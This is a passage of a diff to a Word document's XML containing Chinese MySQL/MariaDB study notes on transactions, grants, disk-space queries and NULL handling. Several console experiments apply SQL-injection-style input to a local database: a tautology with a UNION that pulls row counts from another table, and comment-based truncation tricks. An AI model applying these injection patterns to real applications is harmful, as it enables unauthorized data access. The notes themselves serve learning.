+        <w:t>insert into department (dno, dept_name, mgr_ssn) values('102', 'FI', '20001');</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>insert into employee(ssn, name, salary, dno) values('10001','Zhao',20000, '101');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>insert into employee(ssn, name, salary, dno) values('20001','Singh',19000, '102');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>commit</w:t>
+      </w:r>
+      <w:r>
+        <w:t>；</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>mysql</w:t>
+      </w:r>
+      <w:r>
+        <w:t>中如何查看某个数据库或表占用的磁盘空间：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>查整个库的状态：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>select concat(truncate(sum(data_length)/1024/1024,2),'MB') as data_size,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>concat(truncate(sum(max_data_length)/1024/1024,2),'MB') as max_data_size,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>concat(truncate(sum(data_free)/1024/1024,2),'MB') as data_free,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>concat(truncate(sum(index_length)/1024/1024,2),'MB') as index_size</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>from information_schema.tables where TABLE_SCHEMA = 'databasename';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>查单表：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>select concat(truncate(sum(data_length)/1024/1024,2),'MB') as data_size,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>concat(truncate(sum(max_data_length)/1024/1024,2),'MB') as max_data_size,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>concat(truncate(sum(data_free)/1024/1024,2),'MB') as data_free,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>concat(truncate(sum(index_length)/1024/1024,2),'MB') as index_size</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">ORDER BY </w:t>
-      </w:r>
-      <w:r>
-        <w:t>子句可明确指定结果序。默认为升序</w:t>
-      </w:r>
-      <w:r>
-        <w:t>(ASC)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>，</w:t>
-      </w:r>
-      <w:r>
-        <w:t>NULL</w:t>
-      </w:r>
-      <w:r>
-        <w:t>值在排序时被当作最大值。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>如果取</w:t>
-      </w:r>
-      <w:r>
-        <w:t>“NULL</w:t>
-      </w:r>
-      <w:r>
-        <w:t>值</w:t>
-      </w:r>
-      <w:r>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:t>的字段出现在条件表达式中，将使条件计算为</w:t>
-      </w:r>
-      <w:r>
-        <w:t>NULL</w:t>
-      </w:r>
-      <w:r>
-        <w:t>，进而被排除于结果外。也就是说</w:t>
-      </w:r>
-      <w:r>
-        <w:t>xx=2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>的结果会是一个</w:t>
-      </w:r>
-      <w:r>
-        <w:t>NULL</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>COUNT(*)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>总是返回记录的个数</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">   COUNT(</w:t>
-      </w:r>
-      <w:r>
-        <w:t>字段</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>返回指定字段值非空的记录个数。</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>数据库事务：一个有限的数据库操作序列构成。</w:t>
-      </w:r>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:t>维基百科</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>要么全部执行要要么全部不执行，比如说银行转账中涉及到的数据库操作。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>BEGIN TRANSACTION</w:t>
-      </w:r>
-      <w:r>
-        <w:t>、</w:t>
-      </w:r>
-      <w:r>
-        <w:t>COMMIT</w:t>
-      </w:r>
-      <w:r>
-        <w:t>、</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ROLLBACK</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>回滚</w:t>
-      </w:r>
-      <w:r>
-        <w:t>(Rollback)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>：撤销指定</w:t>
-      </w:r>
-      <w:r>
-        <w:t>SQL</w:t>
-      </w:r>
-      <w:r>
-        <w:t>语句的处理过程。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>提交</w:t>
-      </w:r>
-      <w:r>
-        <w:t>(Commit):</w:t>
-      </w:r>
-      <w:r>
-        <w:t>将还未保存的数据库语句写入数据库表。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>保存点</w:t>
-      </w:r>
-      <w:r>
-        <w:t>(Savepoint):</w:t>
-      </w:r>
-      <w:r>
-        <w:t>事务集中的一个临时占位符，可进行回滚。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>alter table department</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  add constraint department_fk_mgr_ssn foreign key (mgr_ssn) references employee(ssn) initially deferred; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>上面命令中的</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">initially deferred </w:t>
-      </w:r>
-      <w:r>
-        <w:t>表示将对检查的约束推迟到事务的最后。相反的是</w:t>
-      </w:r>
-      <w:r>
-        <w:t>initially immediate</w:t>
-      </w:r>
-      <w:r>
-        <w:t>。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>begin;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">insert into department (dno, dept_name, mgr_ssn) </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>values(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>'101', 'HR', '10001');</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">insert into department (dno, dept_name, mgr_ssn) </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>values(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>'102', 'FI', '20001');</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">insert into </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>employee(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>ssn, name, salary, dno) values('10001','Zhao',20000, '101');</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">insert into </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>employee(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>ssn, name, salary, dno) values('20001','Singh',19000, '102');</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>commit</w:t>
-      </w:r>
-      <w:r>
-        <w:t>；</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>mysql</w:t>
-      </w:r>
-      <w:r>
-        <w:t>中如何查看某个数据库或表占用的磁盘空间：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>查整个库的状态：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>select concat(truncate(sum(data_length)/1024/1024,2),'MB') as data_size,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>concat(truncate(sum(max_data_length)/1024/1024,2),'MB') as max_data_size,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>concat(truncate(sum(data_free)/1024/1024,2),'MB') as data_free,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>concat(truncate(sum(index_length)/1024/1024,2),'MB') as index_size</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>from information_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>schema.tables</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> where TABLE_SCHEMA = 'databasename';</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>查单表：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>select concat(truncate(sum(data_length)/1024/1024,2),'MB') as data_size,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>concat(truncate(sum(max_data_length)/1024/1024,2),'MB') as max_data_size,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>concat(truncate(sum(data_free)/1024/1024,2),'MB') as data_free,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>concat(truncate(sum(index_length)/1024/1024,2),'MB') as index_size</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>from information_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>schema.tables</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> where TABLE_NAME = 'tablename';</w:t>
+        <w:t>from information_schema.tables where TABLE_NAME = 'tablename';</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -8096,15 +7544,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>ERROR 1146 (42S02): Table '</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>student.institution</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>' doesn't exist</w:t>
+        <w:t>ERROR 1146 (42S02): Table 'student.institution' doesn't exist</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8121,15 +7561,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student where length(name)&gt;35;</w:t>
+        <w:t>select count(*) from student where length(name)&gt;35;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8406,15 +7838,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [(none)]&gt; select * from </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>jwc.teacher</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> where '1'='1' and 1=2 union select count(*) from jwc.student limit 10;</w:t>
+        <w:t>MariaDB [(none)]&gt; select * from jwc.teacher where '1'='1' and 1=2 union select count(*) from jwc.student limit 10;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8435,15 +7859,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [(none)]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from jwc.teacher where '1'='1' and 1=2 union select count(*) from jwc.student;</w:t>
+        <w:t>MariaDB [(none)]&gt; select count(*) from jwc.teacher where '1'='1' and 1=2 union select count(*) from jwc.student;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8453,15 +7869,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8498,15 +7906,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>insert into test1 (field</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>1,field</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>2,....) select (field1,field2,....) from test2;</w:t>
+        <w:t>insert into test1 (field1,field2,....) select (field1,field2,....) from test2;</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -8527,15 +7927,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">INSERT INTO </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>card(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>cardno, cardnum) SELECT '222', '200' FROM DUAL WHERE NOT EXISTS(SELECT cardno FROM card WHERE cardno = '222');</w:t>
+        <w:t>INSERT INTO card(cardno, cardnum) SELECT '222', '200' FROM DUAL WHERE NOT EXISTS(SELECT cardno FROM card WHERE cardno = '222');</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8588,15 +7980,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [test2]&gt; insert into </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>jwc.teacher</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> select * from teacher</w:t>
+        <w:t>MariaDB [test2]&gt; insert into jwc.teacher select * from teacher</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8770,15 +8154,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>insert into mysql.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>user(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>Host,User,Password) values('localhost','guest',password('123456'));</w:t>
+        <w:t>insert into mysql.user(Host,User,Password) values('localhost','guest',password('123456'));</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8826,15 +8202,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">grant all privileges on </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>xspeeder.*</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to 'guest'@'localhost' identified by '123456';</w:t>
+        <w:t>grant all privileges on xspeeder.* to 'guest'@'localhost' identified by '123456';</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8865,11 +8233,9 @@
       <w:r>
         <w:t>表示所有数据表。</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>*.*</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>就表示所有数据库。</w:t>
       </w:r>
@@ -8946,15 +8312,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">grant select on </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>xspeeder.*</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to guest@localhost identified by '123456'; #</w:t>
+        <w:t>grant select on xspeeder.* to guest@localhost identified by '123456'; #</w:t>
       </w:r>
       <w:r>
         <w:t>只有这个权限不能使用</w:t>
@@ -9045,54 +8403,22 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| GRANT USAGE ON </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>*.*</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> TO 'guest'@'localhost' IDENTIFIED BY PASSWORD '*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9' |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>| GRANT ALL PRIVILEGES ON `collage</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>`.`</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>ip` TO 'guest'@'localhost'                                                |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>| GRANT SELECT, INSERT ON `collage</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>`.`</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>pe_scan` TO 'guest'@'localhost'                                           |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>| GRANT SELECT ON `collage</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>`.`</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>birth` TO 'guest'@'localhost'                                                     |</w:t>
+        <w:t>| GRANT USAGE ON *.* TO 'guest'@'localhost' IDENTIFIED BY PASSWORD '*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9' |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| GRANT ALL PRIVILEGES ON `collage`.`ip` TO 'guest'@'localhost'                                                |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| GRANT SELECT, INSERT ON `collage`.`pe_scan` TO 'guest'@'localhost'                                           |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| GRANT SELECT ON `collage`.`birth` TO 'guest'@'localhost'                                                     |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9780,8 +9106,6 @@
         </w:rPr>
         <w:t>创建出来的叫做影子表</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -9810,13 +9134,8 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">select * from table limit </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>m,n</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>select * from table limit m,n</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -10160,15 +9479,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ID,NAME</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> FROM A WHERE EXISTS (SELECT * FROM B WHERE A.ID=B.AID)</w:t>
+        <w:t>SELECT ID,NAME FROM A WHERE EXISTS (SELECT * FROM B WHERE A.ID=B.AID)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10213,15 +9524,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ID,NAME</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> FROM A WHERE EXISTS (SELECT * FROM B WHERE B.AID=2)</w:t>
+        <w:t>SELECT ID,NAME FROM A WHERE EXISTS (SELECT * FROM B WHERE B.AID=2)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10235,15 +9538,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ID,NAME</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> FROM A WHERE EXISTS (SELECT * FROM B WHERE B.AID=3)</w:t>
+        <w:t>SELECT ID,NAME FROM A WHERE EXISTS (SELECT * FROM B WHERE B.AID=3)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10362,13 +9657,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>c.“</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>=”</w:t>
+      <w:r>
+        <w:t>c.“=”</w:t>
       </w:r>
       <w:r>
         <w:t>：</w:t>
@@ -10479,13 +9769,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>e.[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>]</w:t>
+      <w:r>
+        <w:t>e.[]</w:t>
       </w:r>
       <w:r>
         <w:t>匹配检查符：</w:t>
@@ -10586,39 +9871,18 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">CREATE SCHEMA schemaname [ AUTHORIZATION </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>username ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> [ schema_element [ ... ] </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">CREATE SCHEMA AUTHORIZATION username [ schema_element [ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>... ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">DROP SCHEMA name [, ...] [ CASCADE | </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>RESTRICT ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve">CREATE SCHEMA schemaname [ AUTHORIZATION username ] [ schema_element [ ... ] </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>CREATE SCHEMA AUTHORIZATION username [ schema_element [ ... ] ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>DROP SCHEMA name [, ...] [ CASCADE | RESTRICT ]</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p/>
@@ -10693,15 +9957,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>MariaDB [test2]&gt; insert into test set name='f</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>',birthdat</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>=2;</w:t>
+        <w:t>MariaDB [test2]&gt; insert into test set name='f',birthdat=2;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11395,15 +10651,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [PE]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from exam where answer=NULL;</w:t>
+        <w:t>MariaDB [PE]&gt; select count(*) from exam where answer=NULL;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11413,15 +10661,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11447,15 +10687,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [PE]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from exam where answer is NULL;</w:t>
+        <w:t>MariaDB [PE]&gt; select count(*) from exam where answer is NULL;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11465,15 +10697,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11532,15 +10756,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student -- where;</w:t>
+        <w:t>MariaDB [jwc]&gt; select count(*) from student -- where;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11555,15 +10771,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11589,15 +10797,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student --where;</w:t>
+        <w:t>MariaDB [jwc]&gt; select count(*) from student --where;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11612,15 +10812,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student where id='2015141462109'; /*  or '1'='1'; */</w:t>
+        <w:t>MariaDB [jwc]&gt; select count(*) from student where id='2015141462109'; /*  or '1'='1'; */</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11630,15 +10822,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) |</w:t>
+        <w:t>| count(*) |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11666,15 +10850,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student where id='2015141462109'; niahfoads</w:t>
+        <w:t>MariaDB [jwc]&gt; select count(*) from student where id='2015141462109'; niahfoads</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11684,15 +10860,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
